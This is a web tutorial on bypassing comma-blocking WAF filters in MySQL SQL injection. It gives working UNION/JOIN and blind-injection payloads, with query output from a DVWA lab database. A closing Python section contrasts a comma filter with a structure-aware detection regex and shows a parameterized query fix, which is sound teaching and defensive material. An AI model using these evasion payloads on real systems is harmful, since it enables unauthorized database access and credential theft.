SQL injection techniques: worked examples of bypassing a comma filter in UNION-based and blind injection
This article walks through how a filter that blocks the comma character can be bypassed in UNION-based (visible) and blind SQL injection. Most readers will not have seen these variants before, so the examples are shared here for reference; read on and see what you can take from them.
1. Bypassing the comma in UNION-based (visible) injection
In a UNION query, the format UNION SELECT 1,2,3,4,5,6,7..n is used to find the columns that are echoed back. That statement contains many commas, so if a WAF blocks the comma character, this form of UNION query can no longer be used.
Bypass
Replace the echoed column positions with the usual injection expressions or other statements, without using commas:
union select 1,2,3;
union select * from ((select 1)A join (select 2)B join (select 3)C);
union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);
Demonstrating the UNION query in the database
Everything from UNION onwards is the part we would inject in the URL; it is shown here directly in the MySQL client only for demonstration. In a real request, any comma in the injected statement may be blocked.
mysql> select user_id,user,password from users union select 1,2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)
Without any comma, using JOIN to inject
mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)
Querying the data we want
mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);
+---------+-------+-------------------------------------------------+
| user_id | user  | password                                        |
+---------+-------+-------------------------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99                |
|       1 | 2     | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)
2. Bypassing the comma in blind injection
The MID and SUBSTR functions extract characters from a text field:
mysql> select mid(user(),1,2);
+-----------------+
| mid(user(),1,2) |
+-----------------+
| ro              |
+-----------------+
1 row in set (0.04 sec)
Querying the ASCII code of the first character of the database user name
mysql> select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|     114 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)
Blind injection: guessing the ASCII value one comparison at a time
mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115);
Empty set

mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)
Comma bypass with the SUBSTRING function
substring(str FROM pos)
returns the substring of str starting at position pos, with no comma needed.
mysql> select substring('hello' from 1);
+---------------------------+
| substring('hello' from 1) |
+---------------------------+
| hello                     |
+---------------------------+
1 row in set (0.04 sec)

mysql> select substring('hello' from 2);
+---------------------------+
| substring('hello' from 2) |
+---------------------------+
| ello                      |
+---------------------------+
1 row in set (0.03 sec)
Injection
mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114);
Empty set
// substring(user() from 2) begins with 'o', and the ASCII code of 'o' is 111, so the comparison with 114 fails

mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)
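The two sections above share one lesson for defenders: a filter keyed on a single character (the comma) misses the JOIN-based column padding and the substring(... FROM ...) form, and it also blocks harmless text that happens to contain a comma. The added example below is not from the original article; it is illustrative Python written for this page. It runs the article's payloads (embedded as constructed sample parameter values) through a comma-only rule and through a structure-aware rule that looks for the SQL shapes the article uses, and then shows the real fix, a parameterized query, executed against an in-memory SQLite table instead of the article's MySQL server. The detection regex, the sample names and the lookup_user function are assumptions made for this demonstration.

```python
import re
import sqlite3

# Constructed sample parameter values: the article's comma-free payloads,
# one comma-bearing payload, and two benign values a real user might send.
SAMPLES = {
    "benign_id": "1",
    "benign_search": "from 2 to 3, please",
    "union_with_commas": "1 union select 1,2,3",
    "union_join": "1 union select * from ((select 1)A join (select 2)B join (select 3)C)",
    "blind_mid": "1 and (select ascii(mid(user(),1,2))=114)",
    "blind_substring_from": "1 and (ascii(substring(user() from 2))=111)",
}


def comma_blocklist(value: str) -> bool:
    """The naive WAF rule the article defeats: flag anything containing a comma."""
    return "," in value


# Structure-aware rule (illustrative, not a production signature): instead of one
# character, match SQL shapes that have no place in an id or free-text parameter.
_SQL_SHAPES = re.compile(
    r"union\s+select"                    # set-operation injection, commas or not
    r"|join\s*\(\s*select"               # comma-free column padding via joined subqueries
    r"|\b(?:mid|substr(?:ing)?)\s*\(",   # character extraction used by blind probes
    re.IGNORECASE,
)


def structural_detect(value: str) -> bool:
    """Collapse whitespace so 'join(select' and 'join ( select' are treated alike."""
    normalized = re.sub(r"\s+", " ", value)
    return bool(_SQL_SHAPES.search(normalized))


def classify(samples=SAMPLES) -> dict:
    """Return {name: (flagged_by_comma_rule, flagged_by_structural_rule)}."""
    return {name: (comma_blocklist(v), structural_detect(v)) for name, v in samples.items()}


def lookup_user(user_id: str) -> list:
    """Parameterized lookup: the value is bound, never spliced into the SQL text,
    so none of the payloads above can alter the statement's structure.
    Uses an in-memory SQLite table mirroring the article's users table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99')")
    rows = conn.execute(
        "SELECT user_id, user FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    for name, (by_comma, by_shape) in classify().items():
        print(f"{name:22s} comma-rule={by_comma!s:5s} structural-rule={by_shape}")
    print("parameterized lookup, benign id :", lookup_user(SAMPLES["benign_id"]))
    print("parameterized lookup, join payload:", lookup_user(SAMPLES["union_join"]))
```

Running the block shows the comma rule missing union_join and blind_substring_from while flagging the benign search string, whereas the structural rule flags every payload and neither benign value. The parameterized lookup returns the admin row for "1" and an empty result for the JOIN payload, because the bound value is compared as data rather than parsed as SQL; pattern matching belongs in monitoring and alerting, and parameterization is what actually closes the hole.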
That concludes "SQL injection techniques: worked examples of bypassing a comma filter in UNION-based and blind injection". Thank you for reading; for more articles like this one, follow the Yisu Cloud industry news channel.